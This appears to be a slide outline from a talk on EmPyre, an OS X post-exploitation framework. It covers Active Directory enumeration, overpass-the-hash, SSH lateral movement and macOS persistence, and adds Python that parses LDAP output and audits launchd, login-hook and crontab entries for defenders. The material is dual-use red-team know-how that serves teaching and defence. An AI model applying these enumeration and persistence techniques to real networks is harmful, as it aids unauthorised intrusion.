    × dig -t SRV _ldap._tcp.example.com
  • 38. PowerView, OS X Style
    × Wanted to mimic the features of PowerSploit’s PowerView to enumerate Active Directory
    × Using ldapsearch, we can mimic “most” features
    × Unfortunately, it creates a log entry for every connection
  • 39. Situational Awareness, AD Enumeration
    × get_computers
    × get_domaincontrollers
    × get_fileservers
    × get_groupmembers
    × get_groupmemberships
    × get_groups
    × get_ous
    × get_userinformation
    × get_users
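Slides 37 to 39 say the PowerView-style get_* functions are built on plain ldapsearch output. To show what that involves, here is an added example (not the EmPyre modules themselves) that parses LDIF the way ldapsearch prints it, including folded continuation lines and base64 `::` values, and answers three of the listed questions over the parsed entries. The LDIF is a constructed sample for an example.com domain, not captured output; the domain-controller test relies on the SERVER_TRUST_ACCOUNT bit (0x2000) of userAccountControl, which is how those accounts are distinguished in AD.

```python
"""Parse ldapsearch LDIF output and answer PowerView-style questions over it.

Added example, not EmPyre's get_* modules. SAMPLE_LDIF is constructed to
look like `ldapsearch -LLL` output for an example.com domain.
"""
import base64
import re

SERVER_TRUST_ACCOUNT = 0x2000  # userAccountControl bit carried by domain controllers

SAMPLE_LDIF = """\
# constructed sample, not captured from a real domain
dn: CN=DC01,OU=Domain Controllers,DC=example,DC=com
objectClass: top
objectClass: computer
cn: DC01
dNSHostName: dc01.example.com
userAccountControl: 532480
operatingSystem: Windows Server 2012 R2

dn: CN=MAC-LAB-01,CN=Computers,DC=example,DC=com
objectClass: top
objectClass: computer
cn: MAC-LAB-01
dNSHostName: mac-lab-01.example.com
userAccountControl: 4096
operatingSystem:: TWFjIE9TIFg=

dn: CN=Domain Admins,CN=Users,DC=example,DC=com
objectClass: group
cn: Domain Admins
member: CN=Alice Admin,CN=Users,DC=example,DC=com
member: CN=Bob Builder,CN=Users,DC=ex
 ample,DC=com

# search result
search: 2
result: 0 Success
"""

_ATTR = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")


def _unfold(text):
    """Join LDIF continuation lines (those starting with a space) onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return a list of entries; each maps attribute name -> list of values."""
    entries, entry = [], {}
    for line in _unfold(text) + [""]:  # sentinel blank line flushes the last entry
        if not line.strip():
            if "dn" in entry:          # the trailing search/result block has no dn
                entries.append(entry)
            entry = {}
            continue
        if line.startswith("#"):
            continue
        m = _ATTR.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":                # base64-encoded value
            value = base64.b64decode(value).decode("utf-8", "replace")
        entry.setdefault(name, []).append(value)
    return entries


def get_computers(entries):
    return [e for e in entries if "computer" in e.get("objectClass", [])]


def get_domaincontrollers(entries):
    """Computers whose userAccountControl has SERVER_TRUST_ACCOUNT set."""
    return [c for c in get_computers(entries)
            if int(c.get("userAccountControl", ["0"])[0]) & SERVER_TRUST_ACCOUNT]


def get_groupmembers(entries, group_cn):
    """Direct members of the group with the given cn (case-insensitive)."""
    for e in entries:
        if "group" in e.get("objectClass", []) and \
                e.get("cn", [""])[0].lower() == group_cn.lower():
            return e.get("member", [])
    return []


def hostnames(computers):
    return [c["dNSHostName"][0] for c in computers if "dNSHostName" in c]


if __name__ == "__main__":
    entries = parse_ldif(SAMPLE_LDIF)
    print("computers:         ", hostnames(get_computers(entries)))
    print("domain controllers:", hostnames(get_domaincontrollers(entries)))
    print("Domain Admins:     ", get_groupmembers(entries, "Domain Admins"))
```

On a live domain each get_* call would be one ldapsearch invocation, and every invocation is a separate bind that the domain controller logs; that is the caveat on slide 38, and it is also what a defender can watch for: a single workstation issuing many LDAP binds and broad subtree searches in a short window.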
  • 41. Overpass-the-Hash
    × Original research by @gentilkiwi and @obscuresec, and OS X research by @passingthehash
    × Upgrading an NT hash into a full Kerberos ticket!
    × Utilities
    × kinit - acquire initial Kerberos credentials
    × klist - list Kerberos credentials
    × kdestroy - remove Kerberos credentials
  • 42.
  • 45. OS X vs Windows
    × Common Windows lateral movement methods:
    × WMI, PSEXEC, WinRM, Remote Desktop
    × OS X disappoints a bit on this front...
    × SSH is available but disabled by default
    × winexe installed through Homebrew is possible
    × EmPyre modules:
    × ssh_command / ssh_launcher
  • 46. Web Service Exploitation
    × JBoss exploit
    × Pass exploit to Empire server
  • 47.
  • 49. OS X vs Windows
    × Common Windows persistence methods:
    × Registry keys
    × Startup folders
    × WMI
    × DLL hijacks
    × Backdoor accounts
    × OS X is also quite fruitful:
    × Crontabs
    × Login hooks
    × Daemons
    × Dylib hijacking
  • 50. Crontabs, Daemons, and Login Hooks
    × Login Hook - user context
    × Bash / AppleScript / binary execution
    × User or any user logon executes the payload
    × Sets com.apple.loginwindow
    × Crontabs - user context
    × Requires Bash / AppleScript / binary
    × Timed execution of the payload
    × Great for continued access
    × Launch Daemons - root context
    × Requires sudo
    × Spawn determined by the XML manifest (reboot)
    × Daemons (services), once started, will restart upon agent loss
  • 51. Persistence with Dylib Hijacking
    × EmPyre implements @patrickwardle’s research to scan for hijackable dylibs!
    × rpath search, weak library import search
    × CreateHijacker module
    × Allows for quick exploitation
    × Ease of generating a payload
    × Patches in the path to the legitimate dylib for proper execution
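Each of the three mechanisms on slide 50 (login hook, crontab, launch daemon) leaves a file a responder can audit. The following is an added example written from that side, not EmPyre's persistence modules: it parses a launchd manifest, the com.apple.loginwindow LoginHook setting and a crontab, and reports what runs, in which context, whether it runs at load and whether it would be restarted, then prioritises entries that go through an interpreter (the Bash / AppleScript / Python payloads the slide names). The plists and crontab below are constructed samples embedded inline; on a host they would be read from /Library/LaunchDaemons and ~/Library/LaunchAgents, the com.apple.loginwindow preferences, and `crontab -l`.

```python
"""Audit the OS X persistence locations named on slide 50.
Added example, not EmPyre code. Inputs are constructed plists/crontab text.
"""
import os
import plistlib

# Interpreters a bash / AppleScript / Python payload would be launched through.
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python2.7", "ruby", "perl"}

LAUNCHD_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/python</string>
    <string>/Library/Application Support/Updater/update.py</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""
LOGINWINDOW_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>LoginHook</key><string>/Library/Scripts/login-hook.sh</string>
</dict>
</plist>
"""
CRONTAB = """\
# constructed user crontab
*/5 * * * * /usr/bin/osascript /Users/demo/Library/Caches/sync.scpt
@reboot /usr/local/bin/backup-agent --quiet
"""


def _uses_interpreter(argv):
    return any(os.path.basename(a) in INTERPRETERS for a in argv)


def audit_launchd(plist_bytes, context):
    """Summarise a launchd manifest; context is 'root' for LaunchDaemons, 'user' for LaunchAgents."""
    p = plistlib.loads(plist_bytes)
    argv = p.get("ProgramArguments") or [p.get("Program", "")]
    return {"mechanism": "launchd", "context": context, "label": p.get("Label", "?"),
            "command": " ".join(argv),
            "run_at_load": bool(p.get("RunAtLoad", False)),
            # KeepAlive is a bool or a condition dict; either way launchd relaunches the job
            "restarts": bool(p.get("KeepAlive", False)),
            "interpreter": _uses_interpreter(argv)}


def audit_loginwindow(plist_bytes):
    """Report a LoginHook if com.apple.loginwindow sets one (runs at every user login)."""
    hook = plistlib.loads(plist_bytes).get("LoginHook")
    if not hook:
        return None
    return {"mechanism": "loginhook", "context": "user", "label": "com.apple.loginwindow",
            "command": hook, "run_at_load": True, "restarts": False,
            "interpreter": _uses_interpreter([hook])}


def audit_crontab(text, context="user"):
    """Turn crontab lines into findings; @reboot counts as run-at-load."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                      # @reboot, @daily, ...
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)              # five time fields, then the command
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        findings.append({"mechanism": "cron", "context": context, "label": schedule,
                         "command": command, "run_at_load": schedule == "@reboot",
                         "restarts": True,             # cron re-runs on schedule regardless
                         "interpreter": _uses_interpreter(command.split())})
    return findings


def flag_for_review(findings):
    """Entries that both survive (run at load or get restarted) and run through an interpreter."""
    return [f for f in findings if f["interpreter"] and (f["run_at_load"] or f["restarts"])]


if __name__ == "__main__":
    found = [audit_launchd(LAUNCHD_PLIST, "root"), audit_loginwindow(LOGINWINDOW_PLIST)]
    found += audit_crontab(CRONTAB)
    for f in flag_for_review(found):
        print("%-9s %-5s %s" % (f["mechanism"], f["context"], f["command"]))
```

The launchd entry is the one to look at first: it runs as root, starts at boot and is kept alive, which is exactly the "restart upon agent loss" behaviour the slide describes, and its interpreter argv is the tell. The login hook is flagged by its mere presence, since Apple has long steered administrators away from LoginHook in favour of launchd, so any value there deserves a look.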
  • 52. Questions?
    × @harmj0y / will [at] harmj0y.net
    × @424f424f / steveborosh [at] gmail.com
    × @killswitch_gui / a.rymdekoharvey [at] gmail.com